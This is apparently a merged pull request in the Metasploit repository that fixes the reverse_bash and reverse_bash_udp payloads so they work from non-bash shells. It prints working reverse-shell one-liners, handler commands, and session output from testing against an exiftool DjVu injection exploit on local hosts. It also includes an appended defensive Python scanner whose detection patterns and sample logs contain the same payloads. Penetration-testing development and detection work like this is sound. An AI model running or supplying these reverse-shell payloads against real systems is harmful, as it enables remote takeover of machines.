
Bash payload works outside of bash context #15875

Merged
merged 2 commits into from
Nov 15, 2021

Conversation

smashery

@smashery smashery commented Nov 15, 2021

This resolves #15191. The chosen solution is to prepend bash -c to the payload, and quote it.

Verification

List the steps needed to make sure this thing works

  • Create a payload using msfvenom -p cmd/unix/reverse_bash lhost=127.0.0.1 lport=1234
  • Start msfconsole
  • In MSF: handler -P 1234 -H 0.0.0.0 -p cmd/unix/reverse_bash
  • Launch a different shell (e.g. sh)
  • Run the command output by msfvenom
  • Repeat these steps for the cmd/unix/reverse_bash_udp payload type
  • Test the payload in a real setting (e.g. exploit/unix/fileformat/exiftool_djvu_ant_perl_injection)

Demonstration

To test this directly:

TCP

user@host:~/git/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_bash lhost=127.0.0.1 lport=1234
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 68 bytes
bash -c '0<&77-;exec 77<>/dev/tcp/127.0.0.1/1234;sh <&77 >&77 2>&77'
user@host:~/git/metasploit-framework$ sh
$ bash -c '0<&77-;exec 77<>/dev/tcp/127.0.0.1/1234;sh <&77 >&77 2>&77'
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 77: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > handler -P 1234 -H 0.0.0.0 -p cmd/unix/reverse_bash
[*] Payload handler running as background job 3.
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > 
[*] Started reverse TCP handler on 0.0.0.0:1234 

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 5 opened (127.0.0.1:1234 -> 127.0.0.1:51092 ) at 2021-11-15 16:14:39 +1100
sessions 5
[*] Starting interaction with 5...

whoami
user

UDP

user@host:~/git/metasploit-framework$ ./msfvenom -p cmd/unix/reverse_bash_udp lhost=127.0.0.1 lport=1235
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 77 bytes
bash -c '0<&31-;exec 31<>/dev/udp/127.0.0.1/1235;echo>&31;sh <&31 >&31 2>&31'
user@host:~/git/metasploit-framework$ sh
$ bash -c '0<&31-;exec 31<>/dev/udp/127.0.0.1/1235;echo>&31;sh <&31 >&31 2>&31'
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 31: Bad file descriptor

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > handler -P 1235 -H 0.0.0.0 -p cmd/unix/reverse_bash_udp
[*] Payload handler running as background job 4.
msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > 
[*] Started reverse UDP handler on 0.0.0.0:1235 

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 6 opened (0.0.0.0:1235 -> 127.0.0.1:50624 ) at 2021-11-15 16:17:30 +1100
sessions 6
[*] Starting interaction with 6...

whoami
user

To test this in a real situation, I created a new user with the default shell of /bin/sh, and tested the issue for which this bug was initially reported.

I created broke.jpg prior to this fix, with a cmd/unix/reverse_bash payload, and workingtcp.jpg and workingudp.jpg after it.

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > jobs

Jobs
====

  Id  Name                    Payload                    Payload opts
  --  ----                    -------                    ------------
  0   Exploit: multi/handler  cmd/unix/reverse_bash      tcp://0.0.0.0:2324
  2   Exploit: multi/handler  cmd/unix/reverse_bash_udp  udp://0.0.0.0:2345

Before the fix

$ ./exiftool /tmp/broke.jpg     
sh: 1: Syntax error: Bad fd number
ExifTool Version Number         : 12.16
File Name                       : broke.jpg
Directory                       : /tmp
File Size                       : 2.5 KiB
File Modification Date/Time     : 2021:11:15 13:58:37+11:00
File Access Date/Time           : 2021:11:15 13:58:49+11:00
File Inode Change Date/Time     : 2021:11:15 13:58:37+11:00
File Permissions                : rw-rw-r--
File Type                       : JPEG (multi-page)
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
Subfile Type                    : Single-page image
DjVu Version                    : 0.24
Spatial Resolution              : 100
Gamma                           : 2.2
Orientation                     : Unknown (0)
Included File ID                : shared_anno.iff
Author                          : .
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
Image Width                     : 8
Image Height                    : 8
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 8x8
Megapixels                      : 0.000064
$ <process ended; new prompt>

After the fix, Reverse Bash TCP

$ ./exiftool /tmp/workingtcp.jpg
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 192: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 3 opened (192.168.1.206:2324 -> 192.168.1.206:51842 ) at 2021-11-15 16:07:06 +1100
sessions 3
[*] Starting interaction with 3...

whoami
test

After the fix, Reverse Bash UDP

$ ./exiftool /tmp/workingudp.jpg
bash: redirection error: cannot duplicate fd: Bad file descriptor
bash: 206: Bad file descriptor

<terminal hangs>

In MSF:

msf6 exploit(unix/fileformat/exiftool_djvu_ant_perl_injection) > [*] Command shell session 4 opened (0.0.0.0:2345 -> 192.168.1.206:40553 ) at 2021-11-15 16:10:23 +1100
sessions 4
[*] Starting interaction with 4...

pwd
/tmp/Image-ExifTool-12.16
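
As an added example (not part of this PR or of the Metasploit project), the following Python checker scans process-execution log lines for the bash-only `/dev/tcp` and `/dev/udp` fd-redirection idiom that these payloads rely on, and records whether the command arrived in the `bash -c '...'` wrapped form launched from a non-bash shell, which is the shape this fix produces. The log lines, regexes and function names are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed process-execution log lines (not from the PR). Lines 2 and 3 carry
# the wrapped TCP/UDP payload forms quoted in the PR, launched through sh -c.
SAMPLE_LOGS = [
    "exec sh -c 'ls -la /tmp'",
    "exec sh -c \"bash -c '0<&77-;exec 77<>/dev/tcp/127.0.0.1/1234;sh <&77 >&77 2>&77'\"",
    "exec sh -c \"bash -c '0<&31-;exec 31<>/dev/udp/127.0.0.1/1235;echo>&31;sh <&31 >&31 2>&31'\"",
    "exec curl -s http://127.0.0.1:8080/health",
]

# bash's network pseudo-devices: /dev/tcp/<host>/<port> and /dev/udp/<host>/<port>
DEV_NET_RE = re.compile(r"/dev/(tcp|udp)/([\w.\-]+)/(\d{1,5})")
# `exec N<>` opens a numbered fd for read/write, the idiom the payloads use
FD_REDIRECT_RE = re.compile(r"exec\s+\d+<>")
# the `bash -c '...'` wrapper this PR prepends so the payload runs under bash
BASH_WRAPPER_RE = re.compile(r"\bbash\s+-c\s+['\"]")
# a non-bash parent shell (sh or dash) invoking the command
SH_PARENT_RE = re.compile(r"\b(sh|dash)\s+-c\b")


def analyze_command(cmdline: str) -> Optional[Dict[str, object]]:
    """Return a finding for a command using /dev/tcp or /dev/udp, else None."""
    m = DEV_NET_RE.search(cmdline)
    if not m:
        return None
    proto, host, port = m.group(1), m.group(2), int(m.group(3))
    return {
        "proto": proto,
        "remote": f"{host}:{port}",
        "fd_redirect": bool(FD_REDIRECT_RE.search(cmdline)),
        "bash_wrapped": bool(BASH_WRAPPER_RE.search(cmdline)),
        "from_non_bash_shell": bool(SH_PARENT_RE.search(cmdline)),
    }


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Run analyze_command over every line and attach 1-based line numbers to hits."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        finding = analyze_command(line)
        if finding:
            finding["line"] = lineno
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOGS):
        print(f)
```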

@smcintyre-r7

Everything looks good to me and appears to be working as intended. I'll get this landed in a moment. Thanks!

@smcintyre-r7 smcintyre-r7 merged commit b428863 into rapid7:master Nov 15, 2021
@smcintyre-r7

Release Notes

This fixes an issue with the reverse Bash command shell payloads where they would not work outside of the context of bash.

@smcintyre-r7 smcintyre-r7 added the rn-fix release notes fix label Nov 15, 2021
@smashery smashery deleted the bash_payload_bugfix branch November 24, 2023 06:00
Successfully merging this pull request may close these issues.

reverse_bash and reverse_bash_udp payloads don't work from non-bash contexts